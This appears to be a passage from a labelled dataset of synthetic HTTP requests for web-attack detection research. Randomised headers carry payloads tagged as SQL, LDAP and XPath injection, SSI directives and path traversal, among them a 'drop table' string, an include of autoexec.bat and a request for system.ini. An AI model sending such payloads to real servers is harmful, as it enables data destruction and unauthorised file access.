Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: identity, gzip;q=0.8, compress;q=0.5, deflate, compress;q=0.5
Accept-Language: edhe-ztpDwu;q=0.1, 2be89T8-lmaedhu, eSghsa-ntakI;q=0.1
Cache-Control: no-store
Client-ip: 192.246.21.91
Cookie: chcoeeseaHu=8abbsanw7allu 
Cookie2: $Version="4"
Date: Thu, 27 Oct 05 17:43:06 CET
ETag: "lRY.im-Vf8FuriFi"
Expect: 100-continue
From: aEtkm@tNLeshe.uk
If-Modified-Since: Wed, 07 Oct 09 09:10:23 GMT
If-Unmodified-Since: Sat, 19 Jan 08 11:06:57 CET
If-Match: *
If-None-Match: *
If-Range: Mon, 11 Jul 05 20:06:11 GMT
Max-Forwards: 3
MIME-Version: 6.9
Pragma: oercr=cko5
Proxy-Authorization: vahee otnsenso=4Odndyfc
Authorization: Basic dHNjdDo2N2R3bnJl
Range: 639-682,28229-
Referer: http://mowSs.ch/aaeouEo/uigirrz/hHioiew/t3ewam.cfm
TE: chunked;q=0.8,trailers
Trailer: Via
User-Agent: Mozilla/4.7 (Windows; U; Win98 6.6; di-ru; rv:2.4.1) Gecko/85063027
UA-CPU: 68000
UA-Disp: 9070,4804,16
UA-OS: Win95
UA-Color: color16
UA-Pixels: 902x0631
Via: rnul/6.4 www.leezneo.js
Transfer-Encoding: gzip
Upgrade: coeeIl/9.2, natae/9.1, hi4/9.9, 3tu3nt/4.6, epa5c/2.6
Warning: 674 28.181.161.239 "fsbetechtt6msa4eu" 
X-Forwarded-For: 81.125.200.90
X-Serial-Number: 87791101469123011682
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44280
Start - Id: 45004
class: PathTransversal
GET /trihtc9aa/ltxes0ynighshaieAe/qN2QVshutdownLbody0dZFfdMreplace/Xk/r0nPkk/vuyzawhpHJYwtAYKKG/5uh2ZKH2VxeAvF/iotuti/L99likep61kpHhavingOH/Nb1eK/acaGV/w_EaA-_rSF.tiff?msOiasre=%27eeOWgautoexecbime&ae=2&snrsaJovq=67186&podaHmn9gK=9rtesel&4ief5W=5889195758&9etraieamttns=149&ee0ttyraaeadgst=g+c2h%24othfe&aetenykH=55aateiucdwI9o&HIa5GAformXftpwka=file%3A%2F%2F%2Fy%3A%2Frgaa%2Frr%2Fspresio.xml&bIfwth=gE&at=70&cTcsA=efl&cceqhbjIe0fw2or=atf HTTP/1.1
Host: www.mSmfh.biz
Connection: keep-alive
Accept: */*
Accept-Charset: utf-8, x-mac-hebrew, euc-cn;q=0.5
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-store
Client-ip: 112.221.77.108
Cookie: 6b6S48GO=bGQ
Cookie2: $Version="13"
Date: Sat, 27 May 06 14:08:28 GMT
ETag: "06Aqq7j6Gd0C_dK"
Expect: oieh
From: SiHai3@Rl2imga.fr
If-Modified-Since: Fri, 21 Mar 08 21:37:00 UTC
If-Unmodified-Since: Sun, 08 Feb 04 12:04:06 UTC
If-Match: "LHIPS74OafuYcVg.J"
If-None-Match: *
If-Range: "FzYKzj_X7HEONkjN0K3p"
Max-Forwards: 4126
MIME-Version: 1.4
Pragma: recc3rfo=air2sr
Proxy-Authorization: Basic b3RkdDJlYTc6bWlhVG41RUE=
Authorization: Basic cmdjaXJiYWw6UnRsdHA=
Range: 2613-116,8-,0-
Referer: http://www.dirtb.be/76aaun.mspx
TE: chunked;q=0.2
Trailer: Max-Forwards
User-Agent: aseaf4r5 (dyfnXaas; oPCfOv-; fDPWkED; aue_hi6)
UA-CPU: StrongARM
UA-Disp: 681,0111,16
UA-OS: FreeBSD
UA-Pixels: 569x3212
Via: 8.8 197.52.0.15:1, 8.2 179.204.73.161:620, 8.0 www.yreq.css
Transfer-Encoding: identity
Upgrade: Eubq/3.7
Warning: 081 www.M0ctanr.tiff "grtbt5tn" "Sun, 15 Apr 07 23:46:08 GMT"
X-Forwarded-For: 2.2.77.25
~~~~~: ~~~~~~~~~~

null

End - Id: 45004
Start - Id: 38695
class: LdapInjection
GET /u@v/Mnf/j4yelanwewj7tfRro/hTGE.gif?ZYB26jstdinSk6=pk8O1&2XYAt6Buk=ieh&hmr=48&tCrtsast2h3oefi=%29++%28+++%7C+%28lt%3DtsB*%29 HTTP/1.0
Host: 108.31.27.194:80
Connection: close
Accept: image/gif, image/*, audio/*
Accept-Charset: x-mac-cyrillic, iso-8859-5, x-mac-korean;q=0.1, utf-8, iso-8859-3
Accept-Encoding: 
Accept-Language: sdt-oP, scMdithe-bi;q=0.0, ri-oymi5hfe, 5ajsf-k;q=0.2, os8c-rG
Cache-Control: 9ecoo=v
Client-ip: 218.181.248.159
Cookie: 3rdeoenIsIn5t=276;connectb.xtermVAJ4-Co=4;@_LKP%u=duts;zM-t=4095580;ufeas=130
Cookie2: $Version="63"
Date: Sat, 10 Apr 04 06:57:54 UTC
ETag: "fO3hMoGbmyhoF4WVadN_"
Expect: ribEgiA=itelO;odita
From: nTromT8u@pzcel.it
If-Modified-Since: Fri, 18 Feb 05 24:23:31 UTC
If-Unmodified-Since: Thu, 13 Aug 09 17:37:05 CET
If-Match: *
If-None-Match: "82WF.AE6RI@rmqrM99"
If-Range: Sat, 07 Apr 07 14:03:42 GMT
Max-Forwards: 0002
MIME-Version: 5.4
Pragma: no-cache
Proxy-Authorization: Digest realm
Authorization: Digest realm
Range: 32-1,3888-481886
Referer: /SntnIe/Teisbia.dll
TE: deflate;q=0.3,trailers,trailers
Trailer: Accept-Language
User-Agent: Mozilla/5.5 (Machintosh; U; Mac OS X 1.8; Np-ai; rv:4.7.5) Gecko/92456059
UA-CPU: 68000
UA-Disp: 0550,3953,16
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 420x9995
Via: 0.1 www.dida.jpeg, 3.6 178.2.65.161, tkUtN/6.4 www.dyvlseh5.htm
Transfer-Encoding: gzip
Upgrade: s1i4r/2.1, mrhpoe/7.3, dua/2.5, lrn/6.4
Warning: 442 77.207.105.249 "n0tcfehentkl" 
X-Forwarded-For: 249.144.3.114
X-Serial-Number: 7677444389981478018
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38695
Start - Id: 39407
class: SSI
GET /eNQryTeifZZUFgX-fq/@BZ@LIlogR4fAXS/ohBTQQEHEjhbVXS/rqdcCbSWLx/oTBwymA@B_9E/frrtstb/a0iwgrl0kW2Rf-owK/M1Gq8xQES.mspx?a9Xlv=%3C%21--%23email+fromhost%3D%22www.yoallchT.com%22+tohost%3D%22mailbox.es3r.com%22+message%3D%22foknpu+t2ie7a+htu8hee+dcce87%22+fromaddress%3D%22wodae.com%22+toaddress%3D%22eS2te.oy.com%22+subject%3D%22ss%22+sender%3D%22tc.com%22+replyto%3D%22tiscljr.com%22+cc%3D%22ef%22+inreplyto%3D%22een9+eo27+r%22+id%3D%22lntaemail%22+--%3E&yi=41944583 HTTP/1.1
Host: 229.16.35.18
Connection: close
Accept: audio/x-wav;q=0.6
Accept-Charset: *
Accept-Encoding: gzip;q=0.5, deflate;q=0.6
Accept-Language: yltmta-cleiOds, r-wl8, 727-ngsym2rp
Cache-Control: no-transform
Cookie: rTlaej38esreowC=klD;i3OrragooS1tatI=eg;Nhnni=et6arDe3eoNeyEyha;yEs3s4AttsYo2=834509993;snuciau=utbqidN
Cookie2: $Version="22"
Date: Sat, 10 Mar 07 02:39:05 GMT
ETag: "IbnKc4-D37dlywxLI"
Expect: 100-continue
If-Modified-Since: Mon, 03 May 04 20:04:20 GMT
If-Unmodified-Since: Mon, 24 Nov 08 05:51:45 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 5427
MIME-Version: 6.3
Pragma: no-cache
Proxy-Authorization: NTLM cmVIZXluZm5vaXJ0ZWVtcDFoMXdudjJpbHd5Ym1pdHQ=
Authorization: NTLM d3NsdHVuZGwzcmdpN213blR0aXR0aTRkbnNhbGoxOGZrbHd3Sg==
Range: 747370-38132,5734-
Referer: /eins.mp3
TE: trailers,trailers,chunked;q=0.6
Trailer: Via
User-Agent: Mozilla/0.8 (X11; U; Linux i586 5.3; eu-7i; rv:0.9.7) Gecko/34729972
UA-CPU: StrongARM
UA-Disp: 9324,2062,8
Via: FTP/5.8 www.btteco.gif, 8.6 74.56.56.252, 8.1 www.q25hh.gif
Transfer-Encoding: eeEnce
X-Serial-Number: 3653526354532
----: ---------------------------------

null

End - Id: 39407
Start - Id: 50066
class: XPathInjection
POST /eKAuitE/eyOP@Lpdn/tnnKhhP/4fVS/dWLeNBzc.cm/baic8V5/YTbzVPD3cn1body.jsp? HTTP/1.1
Content-Length: 110
Content-Language: Fa1aso,anmere
Content-Encoding: gzip
Content-Location: http://s0aow.fr/sr8seevL/esbncfhs/Uneitl/aaty5iq.html
Content-MD5: aWFyY2tiVG5naUpmdWFuaA==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 27 Nov 04 19:03:30 UTC
Last-Modified: Tue, 09 Mar 10 06:23:58 CET
Host: www.omiaefH.org
Connection: keep-alive
Accept: */*;q=0.6
Accept-Charset: *
Accept-Encoding: 
Accept-Language: Hibd7i-O4eh6r, ol-ayend8ii;q=0.2, ns24txee-4esgnr;q=0.8
Cache-Control: no-store
Client-ip: 9.5.7.184
Cookie: ehehihssce=1082;we6eaosEaec=nahdqgw'     or    ei/ptz/child::node()[processing-instruction()=931]    or   'afrlt'= '
Cookie2: $Version="1"
Date: Sat, 25 Oct 08 03:54:07 CET
ETag: W/"o84DSnf9nsx7fsrrg"
Expect: 100-continue
From: btorof@elber.it
If-Modified-Since: Fri, 21 Jan 05 02:21:28 UTC
If-Unmodified-Since: Sat, 26 Aug 06 07:10:16 GMT
If-Match: *
If-None-Match: "hK8_Gs4vU2QbB6kQV"
If-Range: Wed, 03 Nov 04 14:00:25 GMT
Max-Forwards: 8
MIME-Version: 2.6
Pragma: oii2dah=tTizttt
Authorization: NTLM aWVlbXR0aW9taDJHdFlsb2h0dG5vYmV0c3RkZXBsd25mYmE3b3RoZ29Udw==
Range: -38344,41-
Referer: /twRTntyr/mhaa/EtoLd.txt
TE: deflate
Trailer: If-Match
User-Agent: oqZDTP http://www.7mssi.cz
UA-OS: Mac OS X
Via: FTP/9.9 29.13.161.47, 0.0 205.158.222.224
Transfer-Encoding: gn1o; hTss=orfei
Upgrade: nteEi/0.1
Warning: 123 196.148.158.182 "Ymsriob8iitrsuaoTn" "Sat, 17 Jan 04 13:32:01 GMT"
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

moonrseup=sesia&sfR7ms8=iSQWN-8&dn4nCtaaalZll3=532999&duaeeiaioe=idC/n&mze1ncdDsNt=eNp&ItmpTb7S=ePVNpak2ivc3

End - Id: 50066
Start - Id: 39465
class: SSI
GET /efeiwpt/go/r2YCq/frgtnt4inlu/uWqkD8P/WR/boot.ini-n485WbBU3/oahatiujureohin/hGQ7E8IRqy9/o9eD/suxnhOptg2eiiooa/aXVDSeonkaSJcY.swf?tnqcia=e48WF7&Rehnqhno=nynshhXnehe3n&h0vdNacDr8h=snl45JoOb&ens=65718506&pz8biY0g=0277&nWEtmi2aho=929&c4Sstd2rnoi=%3C%21--%23email+fromhost%3D%22www.otlhbd.com%22+tohost%3D%22mailbox.zde.com%22+message%3D%22lnnez+g9seeUm+iubSile+bpy%22+fromaddress%3D%22ns8fxe.com%22+toaddress%3D%22Hlp.tlsBI.com%22+subject%3D%22t%22+sender%3D%22S4.com%22+replyto%3D%22s62nj.com%22+cc%3D%22bv%22+inreplyto%3D%22tuger+anos+tR%22+id%3D%22lem4smail%22+--%3E&Fjae2s2urRlruid=86844434&jl2w2al=3&qq1KDaGHhaving=8567509&eay=nadnbodyeqeglc7j1 HTTP/1.0
Host: 77.245.138.241
Connection: keep-alive
Accept: */*;q=0.2
Accept-Charset: *;q=0.8
Accept-Encoding: deflate, deflate;q=0.7, deflate, identity
Accept-Language: earcflnd-pehone2i;q=0.0, Aidae0u-HxeAanu;q=0.9, ur-leesiI, 2mt-esqnreei;q=0.6
Cache-Control: min-fresh=38895
Client-ip: 91.67.57.209
Cookie: ssYsnhi4cnL4p7T=aUciboA8Iem0lsn0e;Haj=e:r ;TXAbV=3854;4ito6Rle=r-a_
Cookie2: $Version="5"
Date: Fri, 21 Aug 09 13:16:31 CET
ETag: "LhCcRWhjKnJRhPq"
Expect: ris5rtt=czils
From: a7fo@TTrA.it
If-Modified-Since: Thu, 28 May 09 01:42:21 GMT
If-Unmodified-Since: Sun, 20 Sep 09 06:36:51 CET
If-Match: "t6TsBAr4@C.TVfEkYD"
If-None-Match: *
If-Range: *
Max-Forwards: 1683
MIME-Version: 7.4
Pragma: dcsce='7aa'
Authorization: Digest qop=auth-int
Range: -2397
Referer: /osoi/aqtel/aZilo2/dveaObtW/mdsghay.rar
TE: gzip
Trailer: Referer
User-Agent: Mozilla/1.2 (Machintosh; U; Mac OS X 4.3; 1s-sa; rv:3.9.8) Gecko/82746693
UA-CPU: 68000
UA-Disp: 725,135,16
UA-OS: Linux
UA-Color: color32
UA-Pixels: 734x0733
Via: sorier/7.9 51.84.209.111, FTP/7.4 43.149.2.58
Transfer-Encoding: compress
Upgrade: mwv/5.9, jxt9eh/8.4, lch/8.1, nSc/9.6
Warning: 920 www.sgadis2e.js "onamHixfuolaten" 
----: --------------------------------------------

null

End - Id: 39465
Start - Id: 42282
class: SqlInjection
GET /locationO/grDnteqbon/ixVCrRdVRGra-/bset1eei53/rUPTu8EcyP9UfUha/syJ/u.JOp7N5M1onH/Et56GldAtesen/u1Ig0.OvSe-cA0M6rZ-/eDwjakMGlfZQBivPV12b.shtml?j6Vtmpwftp.psecho=2&FVZOvI=140&unnspxonEoe=bHehprocessing-instructiontnecu%5C&7HocsufGuNsl6=%27%3B+drop++table+++imatu HTTP/1.0
Host: 97.13.147.166:80
Connection: aIoaGsnc
Accept: */*;q=0.6
Accept-Charset: *;q=0.2
Accept-Encoding: identity;q=0.8
Accept-Language: aen-tzr;q=0.1, gjwctnao-ptdfei;q=0.4, tsE-vbt, 8oAoitEr-IhaBso;q=0.4, c-eeiOo
Cache-Control: min-fresh=66510
Client-ip: 208.207.204.31
Cookie: ocotrofi0rlecel=gaIbelfers;lnasnsf=sBjrnaiOvnr er;hmUmxAerCHEs=where
Cookie2: $Version="134"
Date: Thu, 05 Jun 08 08:50:06 CET
ETag: W/"SyK1n.19kL0w4qlNg9H6"
Expect: 100-continue
From: 8eae@aimsslc7.net
If-Modified-Since: Mon, 19 Oct 09 12:27:00 GMT
If-Unmodified-Since: Sun, 12 Aug 07 07:55:00 CET
If-Match: *
If-None-Match: "3p@Vvucpbms@lho7EQ1"
If-Range: "SN.9738Ol4aU0HokGT"
Max-Forwards: 5857
MIME-Version: 2.1
Pragma: no-cache
Proxy-Authorization: NTLM ZWVlT2luN25CbmdyZmFla3JsbDF0YXkzZ3Rpa2xmbW4=
Authorization: NTLM YkN0dGFpb3ViSHFlaG9odmhsam5wcm83d2VoaXRubDN0c3FvZjVxcg==
Range: 61054-811,85050-750977,-261
Referer: http://www.eeioan.st/kdrHlmb/wPhph/p2bsea/eztrn/fotb.rar
TE: gzip
Trailer: Upgrade
User-Agent: Mozilla/0.3 (Windows; U; Win98 0.8; im-aa; rv:4.0.8) Gecko/63085338
UA-CPU: 68000
UA-Disp: 8058,0040,16
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 9352x3948
Via: FTP/3.9 www.ltsif7et.css, 5.4 www.g5osm.jpg
Transfer-Encoding: gzip
Upgrade: egf/1.1, bses/7.3
Warning: 903 www.csrnc.htm "rrsgh4khsra2oarcq2na" 
X-Forwarded-For: 27.160.160.90
X-Serial-Number: 280200406213
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42282
Start - Id: 35096
class: SqlInjection
GET /jeeoSxgy/ssu4oresaalstnh/syyrlI6_pq/n2S2ee5a/lx7D-9L82.shtml?a4iOeascfo=b4Ny4uB&hnNe=ansNmst6&5t1dgepuw=8542&3-Sz0azzM=allmq&j69Y7jWlz9H=881577242&O2Ws0rtmaardr=5587024&qeaugiinodjde=tgedanu&tMteoi8SSowoa=%5Cwindow.opennnd&uyrdtjoaat1=376313&ma=3262967&4Saun2rIsau=3lot3hs0etnyedlin HTTP/1.0
Host: 19.189.203.24
Connection: close
Accept: audio/basic;q=0.8
Accept-Charset: iso-8859-1, x-mac-turkish;q=0.5, cp-932;q=0.1, x-mac-ce;q=0.1, iso-8859-3;q=0.1
Accept-Encoding: gzip, compress;q=0.4, gzip
Accept-Language: 2-Vsrrne
Cache-Control: max-age=44256
Cookie: oeqori1ajn8or=revtohiarhsdS2d;WOLo= ;Umunph-OzrlnodeEm_=2748;orek2ibeoroti=qwer'   or  iasmrd_v.Account='mKAsmDce@ad.com;midhxtaR=tYbPoh9rQ8ss
Cookie2: $Version="8"
Date: Thu, 30 Sep 04 03:16:35 CET
ETag: "LuwwJ.ssTjiZsEMfP"
Expect: 100-continue
If-Modified-Since: Fri, 15 Feb 08 24:19:50 UTC
If-Unmodified-Since: Wed, 31 Dec 08 23:33:53 CET
If-Match: "l@dLUTZcWezkYmZ7XI"
If-None-Match: *
If-Range: *
Max-Forwards: 048
MIME-Version: 0.0
Pragma: no-cache
Proxy-Authorization: NTLM aWVsc21uRW1BZVJlNXNGdGEzeGZtcjFoY2NldHVlZW8xZG9NdHVRb3I=
Authorization: Digest realm
Referer: http://www.dwase.biz/noktp/aGpsjrb/htiiWa/dey7/hta2.php4
TE: trailers
Trailer: If-Modified-Since
User-Agent: Mozilla/2.7 (X11; U; Open BSD i586 7.3; it-Lh; rv:9.3.0) Gecko/33714918
UA-Disp: 7445,562,16
UA-OS: Windows NT
UA-Pixels: 712x637
Via: HTTP/6.8 208.0.17.252, FTP/3.3 www.e8iaGy.html
Transfer-Encoding: compress
Warning: 935 www.yeac.htm "gBreee8yeh7aryso17t" "Mon, 01 Jan 07 23:21:49 CET"
X-Forwarded-For: 86.4.185.231
X-Serial-Number: 3566639
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35096
Start - Id: 38985
class: LdapInjection
GET /gAti6ttahvnmj9rei/s8eurag/ShoaglwaaA/w1_UosoeLGLBsZG/05asoeangNo/vNorF6-mfromQ0R/eaiimkatd/ni8V87kQmzEZ4G/jTt1VXKfzRIg3ac.v63m/a0kudonehlw0/hsts9vodatee/oibgkWi12WsaEsei.exe?tIecon7T=rSq&q.XtVaQ03O=5389&bdoliuiunqteot=enOio+&1BscriptOJNY8QB=neo&ibrrnmo=813&7talna=+&yiisnxesrhingf=+enoEa%3F3Stlaai&tioooNnrslene=oP-Hls&eueawUtfh=080557&.Ufqu=lcnpr%29%28%7C+%28hg%3D*%29 HTTP/1.0
Host: www.Scased.be
Connection: 2AhD0eni
Accept: */*;q=0.8
Accept-Charset: x-mac-arabic;q=0.1
Accept-Encoding: 
Accept-Language: *;q=0.9
Cache-Control: max-stale
Client-ip: 21.1.182.109
Cookie: nslr=sewt;OEe1Ka6NjyoY=r9sh-e1e';ikctrg8o=18224;deEHoacnsEeioas=25853
Cookie2: $Version="51"
Date: Wed, 02 Jul 08 14:38:28 GMT
ETag: W/"HJ3W6ctq6S95b2ZaHN"
Expect: mdhcyab9
From: hen1pimh@E3rhrtw1.uk
If-Modified-Since: Sat, 13 Nov 04 14:54:41 GMT
If-Unmodified-Since: Fri, 18 Sep 09 22:34:41 UTC
If-Match: "2FyrxKtO5E7Cq7C"
If-None-Match: *
If-Range: Tue, 18 May 04 10:38:07 UTC
Max-Forwards: 765
MIME-Version: 8.0
Pragma: no-cache
Proxy-Authorization: Basic dlliYjpuaXNk
Authorization: Digest cnonce="rtli"
Range: 2-,-247703
Referer: http://www.oyvnunf.ch/Iwel/rjteae.tar.gz
TE: deflate
Trailer: Date
User-Agent: Mozilla/4.5 (Machintosh; U; PPC Mac OS X 1.5; c3-xt; rv:8.8.1) Gecko/13248751
UA-CPU: MIPS
UA-OS: Windows 98
UA-Pixels: 8193x847
Via: j18a9a/0.1 37.144.199.88
Transfer-Encoding: deflate
Upgrade: rsS/8.2, 0dcoT/9.2, sO3bf/3.2, o6e/7.5
Warning: 291 www.9uop.js "voehitwHsNuovsder" "Mon, 25 Jan 10 10:06:46 CET"
X-Serial-Number: 95673
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 38985
Start - Id: 36225
class: PathTransversal
GET /.nsf/../winnt/system.ini? HTTP/1.0
Host: www.5tgi.it:80
Connection: keep-alive
Accept: */*
Accept-Charset: euc-kr, x-mac-roman;q=0.1
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-transform
Client-ip: 58.131.95.224
Cookie: lmk=14323658;9vEaruSX9s=sVh;X4djkYd=ma;4enlcberds=wSN6AsmXMGN;yeareaeTe=dgobject4;6EhauscAidfowh1=s
Cookie2: $Version="865"
Date: Sun, 23 Oct 05 11:53:40 UTC
ETag: W/"02fTRqFrC56Driy1u8a"
Expect: 100-continue
From: maal4k@enPaImpyhd.st
If-Modified-Since: Thu, 06 Nov 08 13:40:13 UTC
If-Unmodified-Since: Fri, 18 Nov 05 21:33:03 CET
If-Match: *
If-None-Match: *
If-Range: "G8UZdAebuuG3M_5-"
Max-Forwards: 5
MIME-Version: 3.8
Pragma: sDooBra=gs
Proxy-Authorization: Basic YXVkY2VyeDo4U2Ft
Authorization: NTLM dHNib2FvOHNiYTlmcnVzdHBzOTBsZHRjZ3J3bmF0ZmhtYWE=
Range: 183-
Referer: http://www.lseheos.biz/m1toari4.tiff
TE: deflate,chunked;q=0.3
Trailer: Accept-Language
User-Agent: htmo (eaN6AydS; wZQt2kMUM; nr._MrzaTE; iQ-DmRB6)
UA-CPU: MIPS
UA-Disp: 399,5892,8
UA-OS: Win98
Via: FTP/0.7 www.ebnW.jpg, FTP/4.2 www.l7lb.css
Transfer-Encoding: wco0ln; tmumx=othb
Upgrade: eEi/2.2, aafe/8.5, gceaso/0.6, aWa/4.3, tiau/5.9
X-Forwarded-For: 190.138.69.239
X-Serial-Number: 779670420209
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36225
Start - Id: 41541
class: SqlInjection
PUT /iMepbwEX-N1j.bmF_/FhydOeE5/yaDn/ojeJv9/iwhotaehtshwapoed/jiyroererbehycimEtab/eydhkuriceQeeelin4om/inuhiNiFfy/oT@lKCE@u/g5@BF1qr/zIsR/eaqhau.html? HTTP/1.1
Content-Length: 282
Content-Language: eArT
Content-Encoding: gzip
Content-Location: /Oit46r/asefraD/AvSyr.msf
Content-MD5: ZXNuZ2RSbXR0Z2k1MHRzaA==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 14 Jan 04 06:36:06 UTC
Last-Modified: Tue, 12 Apr 05 06:59:27 UTC
Host: www.5hd8mp.st:624
Connection: close
Accept: video/*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-stale
Client-ip: 163.65.132.10
Cookie: oo=ohe6letixnouhi;iA7heemSe5Oa7e3=45;JED1@Pdelete=pAaodaezwinfrometw;f0xZt-W9kL=otinTm6eh3c8;rNhkoe=U<s
Cookie2: $Version="56"
Date: Mon, 06 Mar 06 10:20:19 GMT
ETag: "qo-CqRFe0Y2GKt.7"
Expect: 100-continue
From: nqoEyii@sdULboEa.uk
If-Modified-Since: Mon, 17 Sep 07 21:23:51 CET
If-Unmodified-Since: Fri, 06 Feb 09 14:21:04 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 577
MIME-Version: 5.5
Pragma: no-cache
Proxy-Authorization: NTLM VGlESGVlZTFrMWFGNDJmbTltdDVMbzdzcmJ0dGU1d2hvaGVO
Authorization: Basic ZWFoZTplZXRhc05ocw==
Range: 57094-3
Referer: /crramn/iakw4P/tidg.asp
TE: trailers,chunked
Trailer: If-Modified-Since
User-Agent: Mozilla/2.5 (Windows; U; Win98 5.2; 9H-B2; rv:5.7.5) Gecko/44530182
UA-CPU: StrongARM
UA-OS: Linux
UA-Color: color8
UA-Pixels: 3289x1691
Via: HTTP/4.1 193.19.103.148, hesB8e/5.7 46.113.215.20
Transfer-Encoding: deflate
Upgrade: itaut/3.7, drtrlo/0.9
Warning: 751 www.Lnbf.js "segwzwse" 
----: ----------

36nsToR=atb3A7hosieG&A-winntriDormKVx=5rlsSiazne7&fhtpass8J=aIaPos_-W&inaziaLon=3&LD5ab7lr9mqj=uixm&tzv='   or   id   in    (  select     *   from   user_db     )&Tx4=neaD&pon7gena385N=9047408&4OlAasystemxWs26D=imijI&eTr=aonfedconnect&Gsmtt=171758&utHreqNhEa=mit&matge=+\i

End - Id: 41541
Start - Id: 40719
class: SSI
PUT /vJ4Je.n7ShM6fSid-ZdW/4homePp/pLRs./Bglfdjrerms3lnbS8Ft/ctnetlhiehveennmt.css? HTTP/1.1
Content-Length: 241
Content-Language: toou
Content-Encoding: compress
Content-MD5: c25kaWJhdG9IY3VSaDVvdQ==
Content-Type: application/x-www-form-urlencoded
Last-Modified: Fri, 04 Apr 08 07:09:00 UTC
Host: 134.94.189.236:80
Connection: hest
Accept-Charset: cp-950;q=0.8, iso-8859-8;q=0.5, iso-10646-ucs-2;q=0.2, windows-1258
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-transform
Cookie: rci51asrnemi=01148636;2urrik7T=aAho;lnekrnuL=<!--  #include virtual="d:\windows\autoexec.bat"     -->;7neestdallRh=760
Date: Sat, 24 Jan 09 24:59:37 GMT
If-Modified-Since: Fri, 10 Dec 04 20:47:17 UTC
If-Unmodified-Since: Wed, 24 Mar 04 06:00:39 CET
If-Match: "yUkUKS6oX3W@B6l___"
If-None-Match: "cikFbziowBrYoz@2@"
Pragma: 9='tl2ob'
Referer: http://aEaihht.org/nesnitgr/ktsetnt.mdb
TE: gzip,gzip;q=0.2
User-Agent: Mozilla/6.8 (X11; U; Linux i586 4.1; 1d-o4; rv:2.9.4) Gecko/91145192
----: -----------------------------------------

cyuxveeejahwi=eg4&Lchhezn5rneiNt=neat5;&ajlarmnN=234565846&hObtueic=n4yn2YlBms&zhanemhsi=oedw70GpC_Z&hdna0eaXEeutni=33092&zatobuoia8bd=8732517&zjIRHwCsr=a sa- lxmlerljbon ecataadmin&ooaodTnnokm=hprxeo&9aTJHts5y=ivwJF-Y-Y&esl1d=nn'tfhhrep

End - Id: 40719
Start - Id: 49876
class: XPathInjection
GET /5iOwBInx2E.tiff?xdmry5=copycopy%3Aliker&wiw=olUsrtn&lnaeenbriscs2ah=sh%3Bs+abua+o%25gmaxy&OlogetcD6idUQ=v4QCgpUUgYtd&eeuhtzeoapl6=eiF0X-3gF2K4&LaseR6ttoarkpbt=sAuonedp5ts9d9ahps&pnbuuWand=oiq%27++++or++1%3C+++++OoN%2Ft9ri%2FiQaa%2Fchild%3A%3Atext%28%29%5Bposition%28%29%3D250%5D+or++++%27wt%27++++%3D%27 HTTP/1.0
Host: 205.252.104.219
Connection: vtge
Accept: */*
Accept-Charset: x-mac-roman
Accept-Encoding: *;q=0.9
Accept-Language: x1edsead-wsai;q=0.5
Cache-Control: max-age=5493
Client-ip: 208.72.48.53
Cookie: ldD9tUyt=t203rDN2o;2n=]dL3eCservicesun=osobInbgsoundnnull
Cookie2: $Version="5"
Date: Sun, 03 Apr 05 22:14:59 GMT
ETag: "xcInQ_66Zglzx9B"
Expect: 100-continue
From: s8can@mqtlr.fr
If-Modified-Since: Sat, 14 Jul 07 07:52:09 UTC
If-Unmodified-Since: Thu, 30 Jul 09 11:24:27 UTC
If-Match: "-jPulvoVoH1-@qDy2C"
If-None-Match: *
If-Range: Tue, 19 Sep 06 14:38:20 CET
Max-Forwards: 8
MIME-Version: 2.1
Pragma: no-cache
Proxy-Authorization: oAo4 hnaarqm=nniOb
Authorization: NTLM VWFuNmNhczZUdDFyZmpyVHRlVXJpdHF1aWN0bDVhZUxsU2VvcjBhYWVzaXN0
Range: -615,3-,271930-
Referer: /thvnaumk/bqlw/0tmiatkg/vw3toni.asmx
TE: chunked;q=0.7
Trailer: If-Unmodified-Since
User-Agent: Mozilla/5.2 (Machintosh; U; PPC Mac OS X 2.9; qe-98; rv:5.2.4) Gecko/11544766
UA-CPU: x86
UA-Disp: 2831,824,32
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 8115x7637
Via: FTP/7.9 www.Jget.jpg
Transfer-Encoding: gzip
Upgrade: ioh/5.5, bzl/3.8, 7md9/8.9, Pus3ou/3.2, nIiiic/7.8
Warning: 795 www.cmshn.tiff:1 "yslieeph7eoEbmyPt" "Wed, 09 Mar 05 02:21:36 GMT"
X-Forwarded-For: 88.207.99.219
X-Serial-Number: 87544886060
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 49876
Start - Id: 46278
class: PathTransversal
